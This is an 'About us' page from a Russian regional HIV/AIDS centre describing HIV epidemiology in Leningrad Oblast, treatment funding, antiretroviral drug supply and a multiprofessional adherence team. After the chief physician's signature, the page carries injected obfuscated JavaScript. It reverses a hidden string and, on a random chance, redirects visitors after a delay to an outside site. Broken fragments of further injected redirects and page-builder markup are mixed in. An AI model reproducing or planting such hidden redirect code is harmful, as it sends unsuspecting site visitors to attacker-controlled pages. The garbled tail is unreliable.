О нас

Уважаемые коллеги, дорогие друзья!

Ситуация с эпидемией ВИЧ-инфекции в Ленинградской области имеет такие же тенденции, как и по России в целом. Ведущими путями передачи ВИЧ-инфекции продолжают оставаться парентеральный (при внутривенном употреблении наркотиков) и гетеросексуальный. Наши пациенты – в основном люди молодого возраста, 20-34 лет, при соотношении мужчин и женщин – 1,8: 1. Существенным представляется выявленный в 2010 г. факт, что в возрастной группе 15-18 лет преобладали женщины. Это обусловлено увеличением количества гетеросексуальных случаев передачи заболевания, в связи с чем имеет место значительное количество случаев выявления ВИЧ-инфекции у беременных женщин.

На сегодняшний день большинство больных проживает в районах области, прилежащих к Санкт-Петербургу, куда и откуда жители ездят на работу и учебу, а также в тех районах, где действуют хорошо работающие промышленные предприятия. Особо выделяются Всеволожский район, Гатчинский район, Тосненский район.

Как следует из Территориальной программы государственных гарантий оказания бесплатной медицинской помощи области, все виды помощи больным ВИЧ-инфекцией финансируются за счет областного бюджета и бюджетов муниципальных районов.

Перечень заболеваний и виды медицинской помощи, а также нормативы объемов и стоимости оказания такой помощи применительно к ежегодно принимаемым Территориальным программам государственных гарантий бесплатной медицинской помощи, действующим на территории нашей области, утверждены областным Законом «О государственных гарантиях по обеспечению граждан Российской Федерации бесплатной медицинской помощью на территории Ленинградской области» от 5.12.2000 г. №39-оз.

Обследование и лечение больных ВИЧ-инфекцией осуществляется в соответствии с рекомендованными стандартами оказания медицинской помощи (приказы Министерства здравоохранения и социального развития РФ от 9 июля 2007 г. №474, от 9 июля 2007 г. № 475). По желанию пациент может получать препараты в Центре или лечебно-профилактическом учреждении (ЛПУ) по месту жительства. Выдача лекарственных средств в Центре СПИД и ЛПУ осуществляется на основании назначения лечащего врача. Обеспеченность антиретровирусными препаратами (АВРП) – 100%. В случае диагностирования у пациентов туберкулеза, они госпитализируется в противотуберкулезные больницы, для совместного ведения вместе с врачом-инфекционистом. При необходимости лечения соматической или хирургической патологии по согласованию больные госпитализируются в профильные отделения ЛПУ по месту жительства.

Мониторинг АРВТ осуществляется как в Центре, так и в ЛПУ. Ежеквартально в Центр предоставляются этапные эпикризы пациентов, получающих АРВТ на местах. При необходимости замены схемы АРВТ в Центр также предоставляется эпикриз замены схемы АРВТ. В случае, если пациент по тем или иным причинам прекращает лечение, заполняется эпикриз прекращения АРВТ с указанием причины прекращения.

В каждом ЛПУ области приказом по учреждению назначены ответственные за получение, хранение, обеспечение лекарственными средствами больных ВИЧ-инфекцией. В Центре СПИД ответственное лицо – старшая медсестра поликлинического отделения, в ЛПУ области – доверенные специалисты по ВИЧ-инфекции, старшие медицинские сестры кабинетов инфекционных заболеваний (КИЗ) муниципальных ЛПУ. Специалисты Центра выезжают в районы области для оказания помощи врачам, ответственным в районах за работу с больными ВИЧ-инфекцией.

Каждое ЛПУ имеет неснижаемый запас АРВП для лечения больных ВИЧ-инфекцией, а также для плановой и экстренной химиопрофилактики ВИЧ-инфекции. ЦРКБ имеют запас препаратов для проведения постконтактной химиопрофилактики по рекомендованной комбинированной схеме. Родильные дома имеют запасы вирамуна для проведения экстренной профилактики перинатальной ВИЧ-инфекции.
В нашем Центре работает мультипрофессилнальная команда— наиболее эффективный и наименее затратный метод формирования приверженности лечению ВИЧ-инфицированных пациентов. Команда специалистов — врач, психолог, медсестра, специалист по социальной работе, нарколог, фтизиатр, равный консультант — оказывают комплексную медико-психо-социальную помощь наиболее неблагополучным в плане «срыва с лечения» пациентам, направляя основные усилия на формирование приверженности пациента к лечению.На сегодняшний день на сопровождении находится около 800 пациентов.. Деятельность мультипрофессиональной команды (МПК) осуществляется при поддержке Фонда «Российское здравоохранение» в рамках программы «Развитие стратегии лечения населения Российской Федерации, уязвимого к ВИЧ/СПИД».

Мы оказываем плановую амбулаторную помощь при болезни, вызванной вирусом иммунодефицита человека; плановый амбулаторный консультативный прием больных хроническими вирусными гепатитами В и С, нуждающихся в противовирусной терапии. Перечень лекарственных препаратов, назначаемых по решению ВК утвержден на основании Приказа Министерства здравоохранения Российской Федерации от 24.12.2012 г. № 1511 н Стандарт первичной медико-санитарной помощи при болезни, вызванной вирусом иммунодефицита человека (ВИЧ)

Проблемы наших больных характерны для всех так называемых социальных заболеваний. А значит, решить их можно только совместными усилиями организаций всех видов и форм собственности, работающих с населением. Так, благодаря взаимодействию всех заинтересованных сторон в течение ряда последних лет удается сдерживать заболеваемость примерно на одном уровне.

Главный врач Центра А.Ю. Ковеленов
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to-2015-scaled.jpg” alt=”” width=”2560″ height=”1941″ class=”alignnone size-full wp-image-2426″ />

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dow=”off” use_overlay=”off” animation=”left” sticky=”off” align=”left” force_fullwidth=”off” always_center_on_mobile=”on” use_border_color=”off” border_color=”#ffffff” border_style=”solid” /]